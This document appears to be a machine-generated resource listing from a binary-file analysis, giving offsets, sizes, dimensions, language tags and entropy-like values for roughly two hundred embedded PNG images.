                                                                                      PNG0x5cb83c0x352PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0129411764705882
                                                                                      PNG0x5cbb900x1288PNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.002318718381113
                                                                                      PNG0x5cce180x211PNG image data, 100 x 34, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0207939508506616
                                                                                      PNG0x5cd02c0x2e4PNG image data, 100 x 136, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0148648648648648
                                                                                      PNG0x5cd3100x13adPNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021838395870557
                                                                                      PNG0x5ce6c00x365PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0126582278481013
                                                                                      PNG0x5cea280x374PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.012443438914027
                                                                                      PNG0x5ced9c0x126bPNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0023329798515377
                                                                                      PNG0x5d00080xd4PNG image data, 3 x 26, 8-bit/color RGBA, non-interlacedEnglishUnited States1.028301886792453
                                                                                      PNG0x5d00dc0x1394PNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.00219473264166
                                                                                      PNG0x5d14700x374PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.012443438914027
                                                                                      PNG0x5d17e40x3f4PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0108695652173914
                                                                                      PNG0x5d1bd80x1304PNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0022596548890714
                                                                                      PNG0x5d2edc0x1397PNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021934197407776
                                                                                      PNG0x5d42740x373PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0124575311438277
                                                                                      PNG0x5d45e80x33dPNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0132689987937273
                                                                                      PNG0x5d49280x119ePNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.002439024390244
                                                                                      PNG0x5d5ac80xa6PNG image data, 15 x 15, 8-bit/color RGB, non-interlacedEnglishUnited States1.0120481927710843
                                                                                      PNG0x5d5b700x211PNG image data, 100 x 34, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0207939508506616
                                                                                      PNG0x5d5d840x2f7PNG image data, 100 x 136, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0144927536231885
                                                                                      PNG0x5d607c0x16ePNG image data, 9 x 38, 8-bit/color RGBA, non-interlacedEnglishUnited States1.030054644808743
                                                                                      PNG0x5d61ec0x73PNG image data, 5 x 5, 8-bit/color RGB, non-interlacedEnglishUnited States0.9826086956521739
                                                                                      PNG0x5d62600x117PNG image data, 11 x 24, 8-bit/color RGBA, non-interlacedEnglishUnited States1.021505376344086
                                                                                      PNG0x5d63780x67PNG image data, 2 x 55, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9902912621359223
                                                                                      PNG0x5d63e00xcePNG image data, 90 x 12, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0242718446601942
                                                                                      PNG0x5d64b00xa40PNG image data, 86 x 240, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9733231707317073
                                                                                      PNG0x5d6ef00x283PNG image data, 86 x 8, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0171073094867806
                                                                                      PNG0x5d71740x93PNG image data, 5 x 8, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0136054421768708
                                                                                      PNG0x5d72080x96aPNG image data, 18 x 54, 8-bit/color RGBA, non-interlacedEnglishUnited States1.004564315352697
                                                                                      PNG0x5d7b740x99bPNG image data, 18 x 54, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0044733631557543
                                                                                      PNG0x5d85100x2f7PNG image data, 11 x 45, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0144927536231885
                                                                                      PNG0x5d88080x1ffPNG image data, 70 x 23, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0215264187866928
                                                                                      PNG0x5d8a080x1f7PNG image data, 70 x 23, 8-bit/color RGBA, non-interlacedEnglishUnited States1.021868787276342
                                                                                      PNG0x5d8c000xb6PNG image data, 2 x 20, 8-bit/color RGB, non-interlacedEnglishUnited States1.010989010989011
                                                                                      PNG0x5d8cb80x94PNG image data, 11 x 11, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0135135135135136
                                                                                      PNG0x5d8d4c0x3e6PNG image data, 17 x 32, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0110220440881763
                                                                                      PNG0x5d91340x3e6PNG image data, 17 x 32, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0110220440881763
                                                                                      PNG0x5d951c0x315PNG image data, 17 x 80, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0139416983523448
                                                                                      PNG0x5d98340x259PNG image data, 13 x 60, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0183028286189684
                                                                                      PNG0x5d9a900x205PNG image data, 17 x 80, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0212765957446808
                                                                                      PNG0x5d9c980x176PNG image data, 13 x 60, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0294117647058822
                                                                                      PNG0x5d9e100x124PNG image data, 17 x 80, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0136986301369864
                                                                                      PNG0x5d9f340xd7PNG image data, 13 x 60, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0
                                                                                      PNG0x5da00c0x28fPNG image data, 17 x 80, 8-bit/color RGBA, non-interlacedEnglishUnited States1.016793893129771
                                                                                      PNG0x5da29c0x225PNG image data, 13 x 60, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0200364298724955
                                                                                      PNG0x5da4c40xdd3PNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9960440802486578
                                                                                      PNG0x5db2980x123PNG image data, 72 x 15, 8-bit/color RGB, non-interlacedEnglishUnited States1.0378006872852235
                                                                                      PNG0x5db3bc0x10bPNG image data, 30 x 24, 8-bit/color RGB, non-interlacedEnglishUnited States1.0337078651685394
                                                                                      PNG0x5db4c80x83PNG image data, 35 x 3, 8-bit/color RGB, non-interlacedEnglishUnited States1.0076335877862594
                                                                                      PNG0x5db54c0x12fPNG image data, 9 x 9, 8-bit/color RGB, non-interlacedEnglishUnited States1.0264026402640265
                                                                                      PNG0x5db67c0x48dPNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.009442060085837
                                                                                      PNG0x5dbb0c0x261PNG image data, 72 x 22, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0180623973727423
                                                                                      PNG0x5dbd700x79PNG image data, 4 x 4, 8-bit/color RGB, non-interlacedEnglishUnited States0.9752066115702479
                                                                                      PNG0x5dbdec0x1b5PNG image data, 70 x 23, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9931350114416476
                                                                                      PNG0x5dbfa40x293PNG image data, 70 x 31, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0166919575113809
                                                                                      PNG0x5dc2380x11aPNG image data, 70 x 23, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9716312056737588
                                                                                      PNG0x5dc3540xdePNG image data, 22 x 38, 8-bit/color RGB, non-interlacedEnglishUnited States1.027027027027027
                                                                                      PNG0x5dc4340x38dPNG image data, 55 x 22, 8-bit/color RGBA, non-interlacedEnglishUnited States1.012101210121012
                                                                                      PNG0x5dc7c40x265PNG image data, 55 x 22, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0179445350734095
                                                                                      PNG0x5dca2c0x124PNG image data, 30 x 24, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0308219178082192
                                                                                      PNG0x5dcb500xaaPNG image data, 2 x 19, 8-bit/color RGB, non-interlacedEnglishUnited States1.011764705882353
                                                                                      PNG0x5dcbfc0x12aPNG image data, 20 x 40, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0268456375838926
                                                                                      PNG0x5dcd280x209PNG image data, 10 x 28, 8-bit/color RGB, non-interlacedEnglishUnited States1.021113243761996
                                                                                      PNG0x5dcf340xf5PNG image data, 10 x 28, 8-bit/color RGB, non-interlacedEnglishUnited States1.0244897959183674
                                                                                      PNG0x5dd02c0x9fPNG image data, 54 x 31, 8-bit/color RGB, non-interlacedEnglishUnited States1.0125786163522013
                                                                                      PNG0x5dd0cc0x148PNG image data, 54 x 124, 8-bit/color RGB, non-interlacedEnglishUnited States1.0335365853658536
                                                                                      PNG0x5dd2140xacPNG image data, 7 x 7, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0174418604651163
                                                                                      PNG0x5dd2c00x8bPNG image data, 3 x 11, 8-bit/color RGBA, non-interlacedEnglishUnited States1.014388489208633
                                                                                      PNG0x5dd34c0xa4PNG image data, 9 x 8, 8-bit/color RGB, non-interlacedEnglishUnited States1.0
                                                                                      PNG0x5dd3f00x94PNG image data, 9 x 8, 8-bit/color RGB, non-interlacedEnglishUnited States1.0067567567567568
                                                                                      PNG0x5dd4840x87PNG image data, 15 x 3, 8-bit/color RGB, non-interlacedEnglishUnited States1.0
                                                                                      PNG0x5dd50c0xa6PNG image data, 7 x 7, 8-bit/color RGB, non-interlacedEnglishUnited States1.0120481927710843
                                                                                      PNG0x5dd5b40xc5PNG image data, 7 x 7, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0203045685279188
                                                                                      PNG0x5dd67c0xa54PNG image data, 13 x 156, 8-bit/color RGBA, non-interlacedEnglishUnited States1.004160363086233
                                                                                      PNG0x5de0d00x1edaPNG image data, 52 x 336, 8-bit/color RGBA, non-interlacedEnglishUnited States1.001392757660167
                                                                                      PNG0x5dffac0x1cbPNG image data, 38 x 38, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0239651416122004
                                                                                      PNG0x5e01780x53bPNG image data, 30 x 16, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0082150858849888
                                                                                      PNG0x5e06b40x4f3PNG image data, 22 x 66, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0086819258089976
                                                                                      PNG0x5e0ba80x11aPNG image data, 20 x 12, 8-bit/color RGBA, non-interlacedEnglishUnited States1.024822695035461
                                                                                      PNG0x5e0cc40x5afPNG image data, 23 x 154, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0075601374570446
                                                                                      PNG0x5e12740x3ffPNG image data, 9 x 132, 8-bit/color RGBA, non-interlacedEnglishUnited States1.010752688172043
                                                                                      PNG0x5e16740x461PNG image data, 23 x 154, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0098126672613739
                                                                                      PNG0x5e1ad80x4ccPNG image data, 10 x 132, 8-bit/color RGBA, non-interlacedEnglishUnited States1.008957654723127
                                                                                      PNG0x5e1fa40x474PNG image data, 23 x 154, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0096491228070175
                                                                                      PNG0x5e24180x3efPNG image data, 9 x 132, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0109235352532273
                                                                                      PNG0x5e28080x44aPNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0100182149362478
                                                                                      PNG0x5e2c540x41fPNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0104265402843602
                                                                                      PNG0x5e30740x39bPNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0119176598049837
                                                                                      PNG0x5e34100x4a1PNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.009282700421941
                                                                                      PNG0x5e38b40x1b3PNG image data, 15 x 56, 8-bit/color RGBA, non-interlacedEnglishUnited States1.025287356321839
                                                                                      PNG0x5e3a680xf9PNG image data, 32 x 8, 8-bit/color RGBA, non-interlacedEnglishUnited States1.036144578313253
                                                                                      PNG0x5e3b640x1bfaPNG image data, 38 x 114, 8-bit/color RGBA, non-interlacedEnglishUnited States1.001535883831332
                                                                                      PNG0x5e57600xb43PNG image data, 22 x 132, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0038154699965314
                                                                                      PNG0x5e62a40x609PNG image data, 11 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0071197411003237
                                                                                      PNG0x5e68b00x18aePNG image data, 43 x 234, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0017410572966128
                                                                                      PNG0x5e81600x1177PNG image data, 43 x 135, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0024602997092373
                                                                                      PNG0x5e92d80x25ecPNG image data, 43 x 330, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0011330861145447
                                                                                      PNG0x5eb8c40xac7PNG image data, 22 x 88, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0039869517941282
                                                                                      PNG0x5ec38c0xa82PNG image data, 14 x 276, 8-bit/color RGBA, non-interlacedEnglishUnited States1.004089219330855
                                                                                      PNG0x5ece100xac7PNG image data, 14 x 276, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0039869517941282
                                                                                      PNG0x5ed8d80x5d3PNG image data, 15 x 80, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0073775989268947
                                                                                      PNG0x5edeac0x575PNG image data, 15 x 76, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0078740157480315
                                                                                      PNG0x5ee4240x5eaPNG image data, 15 x 84, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0072655217965654
                                                                                      PNG0x5eea100x222PNG image data, 54 x 69, 8-bit/color RGBA, non-interlacedEnglishUnited States1.02014652014652
                                                                                      PNG0x5eec340x588PNG image data, 22 x 44, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0077683615819208
                                                                                      PNG0x5ef1bc0x552PNG image data, 64 x 26, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0080763582966226
                                                                                      PNG0x5ef7100x532PNG image data, 64 x 26, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0082706766917293
                                                                                      PNG0x5efc440x624PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.006997455470738
                                                                                      PNG0x5f02680xf6fPNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0027841052898
                                                                                      PNG0x5f11d80x98PNG image data, 1 x 23, 8-bit/color RGBA, non-interlacedEnglishUnited States1.013157894736842
                                                                                      PNG0x5f12700x13c1PNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021752026893416
                                                                                      PNG0x5f26340x37dPNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0123180291153415
                                                                                      PNG0x5f29b40x395PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0119956379498365
                                                                                      PNG0x5f2d4c0xbeaPNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0036065573770492
                                                                                      PNG0x5f39380x13b4PNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021808088818398
                                                                                      PNG0x5f4cec0x369PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0126002290950744
                                                                                      PNG0x5f50580x3ccPNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0113168724279835
                                                                                      PNG0x5f54240xcb2PNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0033846153846153
                                                                                      PNG0x5f60d80x13acPNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021842732327244
                                                                                      PNG0x5f74840x364PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.012672811059908
                                                                                      PNG0x5f77e80x3baPNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0115303983228512
                                                                                      PNG0x5f7ba40xbffPNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0035818951481603
                                                                                      PNG0x5f87a40x139fPNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021899263388414
                                                                                      PNG0x5f9b440x380PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0122767857142858
                                                                                      PNG0x5f9ec40x352PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0129411764705882
                                                                                      PNG0x5fa2180xbf8PNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0035900783289817
                                                                                      PNG0x5fae100x1e3PNG image data, 100 x 34, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0227743271221532
                                                                                      PNG0x5faff40x3d2PNG image data, 100 x 136, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0112474437627812
                                                                                      PNG0x5fb3c80x13adPNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021838395870557
                                                                                      PNG0x5fc7780x365PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0126582278481013
                                                                                      PNG0x5fcae00x374PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.012443438914027
                                                                                      PNG0x5fce540xb9aPNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0037037037037038
                                                                                      PNG0x5fd9f00xd4PNG image data, 3 x 26, 8-bit/color RGBA, non-interlacedEnglishUnited States1.028301886792453
                                                                                      PNG0x5fdac40x1394PNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.00219473264166
                                                                                      PNG0x5fee580x374PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.012443438914027
                                                                                      PNG0x5ff1cc0x3f4PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0108695652173914
                                                                                      PNG0x5ff5c00xc62PNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0034700315457412
                                                                                      PNG0x6002240x1397PNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021934197407776
                                                                                      PNG0x6015bc0x373PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0124575311438277
                                                                                      PNG0x6019300x33dPNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0132689987937273
                                                                                      PNG0x601c700xb84PNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0003392130257802
                                                                                      PNG0x6027f40xb1PNG image data, 15 x 15, 8-bit/color RGB, non-interlacedEnglishUnited States1.0169491525423728
                                                                                      PNG0x6028a80x1daPNG image data, 100 x 34, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0232067510548524
                                                                                      PNG0x602a840x375PNG image data, 100 x 136, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0124293785310734
                                                                                      PNG0x602dfc0x1a5PNG image data, 9 x 38, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0261282660332542
                                                                                      PNG0x602fa40x71PNG image data, 5 x 5, 8-bit/color RGB, non-interlacedEnglishUnited States0.9911504424778761
                                                                                      PNG0x6030180x11aPNG image data, 11 x 24, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0283687943262412
                                                                                      PNG0x6031340x67PNG image data, 2 x 55, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9902912621359223
                                                                                      PNG0x60319c0xe0PNG image data, 90 x 12, 8-bit/color RGBA, non-interlacedEnglishUnited States1.03125
                                                                                      PNG0x60327c0xa40PNG image data, 86 x 240, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9733231707317073
                                                                                      PNG0x603cbc0x283PNG image data, 86 x 8, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0171073094867806
                                                                                      PNG0x603f400x93PNG image data, 5 x 8, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0136054421768708
                                                                                      PNG0x603fd40x985PNG image data, 18 x 54, 8-bit/color RGBA, non-interlacedEnglishUnited States1.00451374640952
                                                                                      PNG0x60495c0x9caPNG image data, 18 x 54, 8-bit/color RGBA, non-interlacedEnglishUnited States1.00438946528332
                                                                                      PNG0x6053280x339PNG image data, 11 x 45, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0133333333333334
                                                                                      PNG0x6056640x214PNG image data, 70 x 23, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0206766917293233
                                                                                      PNG0x6058780x22ePNG image data, 70 x 23, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0197132616487454
                                                                                      PNG0x605aa80xb3PNG image data, 2 x 20, 8-bit/color RGB, non-interlacedEnglishUnited States1.011173184357542
                                                                                      PNG0x605b5c0x95PNG image data, 11 x 11, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9932885906040269
                                                                                      PNG0x605bf40x414PNG image data, 17 x 32, 8-bit/color RGBA, non-interlacedEnglishUnited States1.010536398467433
                                                                                      PNG0x6060080x414PNG image data, 17 x 32, 8-bit/color RGBA, non-interlacedEnglishUnited States1.010536398467433
                                                                                      PNG0x60641c0x1fbPNG image data, 17 x 80, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0216962524654833
                                                                                      PNG0x6066180x179PNG image data, 13 x 60, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0159151193633953
                                                                                      PNG0x6067940x179PNG image data, 17 x 80, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0053050397877985
                                                                                      PNG0x6069100x114PNG image data, 13 x 60, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0289855072463767
                                                                                      PNG0x606a240x10ePNG image data, 17 x 80, 8-bit/color RGBA, non-interlacedEnglishUnited States1.011111111111111
                                                                                      PNG0x606b340xb6PNG image data, 13 x 60, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0054945054945055
                                                                                      PNG0x606bec0x17ePNG image data, 17 x 80, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0287958115183247
                                                                                      PNG0x606d6c0x15cPNG image data, 13 x 60, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0201149425287357
                                                                                      PNG0x606ec80xf6fPNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0027841052898
                                                                                      PNG0x607e380x143PNG image data, 72 x 15, 8-bit/color RGB, non-interlacedEnglishUnited States1.0340557275541795
                                                                                      PNG0x607f7c0x110PNG image data, 30 x 24, 8-bit/color RGB, non-interlacedEnglishUnited States1.0294117647058822
                                                                                      PNG0x60808c0x87PNG image data, 35 x 3, 8-bit/color RGB, non-interlacedEnglishUnited States1.0074074074074073
                                                                                      PNG0x6081140x13bPNG image data, 9 x 9, 8-bit/color RGB, non-interlacedEnglishUnited States1.0253968253968253
                                                                                      PNG0x6082500x4a1PNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.009282700421941
                                                                                      PNG0x6086f40x25ePNG image data, 72 x 22, 8-bit/color RGBA, non-interlacedEnglishUnited States1.018151815181518
                                                                                      PNG0x6089540x79PNG image data, 4 x 4, 8-bit/color RGB, non-interlacedEnglishUnited States0.9752066115702479
                                                                                      PNG0x6089d00x167PNG image data, 70 x 23, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9972144846796658
                                                                                      PNG0x608b380x278PNG image data, 70 x 31, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0174050632911393
                                                                                      PNG0x608db00x11aPNG image data, 70 x 23, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9680851063829787
                                                                                      PNG0x608ecc0xd4PNG image data, 22 x 38, 8-bit/color RGB, non-interlacedEnglishUnited States1.0235849056603774
                                                                                      PNG0x608fa00x38dPNG image data, 55 x 22, 8-bit/color RGBA, non-interlacedEnglishUnited States1.012101210121012
                                                                                      PNG0x6093300x265PNG image data, 55 x 22, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0179445350734095
                                                                                      PNG0x6095980x11aPNG image data, 30 x 24, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0319148936170213
                                                                                      PNG0x6096b40xaaPNG image data, 2 x 19, 8-bit/color RGB, non-interlacedEnglishUnited States1.011764705882353
                                                                                      PNG0x6097600x12aPNG image data, 20 x 40, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0268456375838926
                                                                                      PNG0x60988c0x209PNG image data, 10 x 28, 8-bit/color RGB, non-interlacedEnglishUnited States1.021113243761996
                                                                                      PNG0x609a980xf5PNG image data, 10 x 28, 8-bit/color RGB, non-interlacedEnglishUnited States1.0244897959183674
                                                                                      PNG0x609b900xa6PNG image data, 54 x 31, 8-bit/color RGB, non-interlacedEnglishUnited States1.0180722891566265
                                                                                      PNG0x609c380x150PNG image data, 54 x 124, 8-bit/color RGB, non-interlacedEnglishUnited States1.0327380952380953
                                                                                      PNG0x609d880xacPNG image data, 7 x 7, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0174418604651163
                                                                                      PNG0x609e340x8bPNG image data, 3 x 11, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0
                                                                                      PNG0x609ec00x98PNG image data, 9 x 8, 8-bit/color RGB, non-interlacedEnglishUnited States1.006578947368421
                                                                                      PNG0x609f580x91PNG image data, 9 x 8, 8-bit/color RGB, non-interlacedEnglishUnited States1.006896551724138
                                                                                      PNG0x609fec0x7dPNG image data, 15 x 3, 8-bit/color RGB, non-interlacedEnglishUnited States1.008
                                                                                      PNG0x60a06c0xa6PNG image data, 7 x 7, 8-bit/color RGB, non-interlacedEnglishUnited States1.0120481927710843
                                                                                      PNG0x60a1140xbdPNG image data, 7 x 7, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0105820105820107
                                                                                      PNG0x60a1d40xa07PNG image data, 13 x 156, 8-bit/color RGBA, non-interlacedEnglishUnited States1.004285157771718
                                                                                      PNG0x60abdc0x1de1PNG image data, 52 x 336, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0014380964832004
                                                                                      PNG0x60c9c00x1bePNG image data, 38 x 38, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0246636771300448
                                                                                      PNG0x60cb800x53bPNG image data, 30 x 16, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0082150858849888
                                                                                      PNG0x60d0bc0x46cPNG image data, 22 x 66, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0097173144876326
                                                                                      PNG0x60d5280xafPNG image data, 20 x 12, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0171428571428571
                                                                                      PNG0x60d5d80x701PNG image data, 23 x 154, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0061349693251533
                                                                                      PNG0x60dcdc0x498PNG image data, 9 x 132, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0093537414965987
                                                                                      PNG0x60e1740x5c1PNG image data, 23 x 154, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0074677528852682
                                                                                      PNG0x60e7380x539PNG image data, 10 x 132, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0082273747195214
                                                                                      PNG0x60ec740x5c7PNG image data, 23 x 154, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0074374577417173
                                                                                      PNG0x60f23c0x47fPNG image data, 9 x 132, 8-bit/color RGBA, non-interlacedEnglishUnited States1.009556907037359
                                                                                      PNG0x60f6bc0x585PNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0077848549186128
                                                                                      PNG0x60fc440x546PNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0081481481481482
                                                                                      PNG0x61018c0x4e1PNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0088070456365092
                                                                                      PNG0x6106700x5b0PNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.007554945054945
                                                                                      PNG0x610c200x1b3PNG image data, 15 x 56, 8-bit/color RGBA, non-interlacedEnglishUnited States1.025287356321839
                                                                                      PNG0x610dd40xeaPNG image data, 32 x 8, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0299145299145298
                                                                                      PNG0x610ec00x1ad9PNG image data, 38 x 114, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0016004655899897
                                                                                      PNG0x61299c0xb43PNG image data, 22 x 132, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0038154699965314
                                                                                      PNG0x6134e00x609PNG image data, 11 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0071197411003237
                                                                                      PNG0x613aec0x18aePNG image data, 43 x 234, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0017410572966128
                                                                                      PNG0x61539c0x1177PNG image data, 43 x 135, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0024602997092373
                                                                                      PNG0x6165140x25ecPNG image data, 43 x 330, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0011330861145447
                                                                                      PNG0x618b000xad3PNG image data, 22 x 88, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0039696860339227
                                                                                      PNG0x6195d40xbc8PNG image data, 14 x 276, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0036472148541113
                                                                                      PNG0x61a19c0xc2ePNG image data, 14 x 276, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0035279025016035
                                                                                      PNG0x61adcc0x5ddPNG image data, 15 x 80, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0073284477015323
                                                                                      PNG0x61b3ac0x597PNG image data, 15 x 76, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0076869322152342
                                                                                      PNG0x61b9440x5f8PNG image data, 15 x 84, 8-bit/color RGBA, non-interlacedEnglishUnited States1.007198952879581
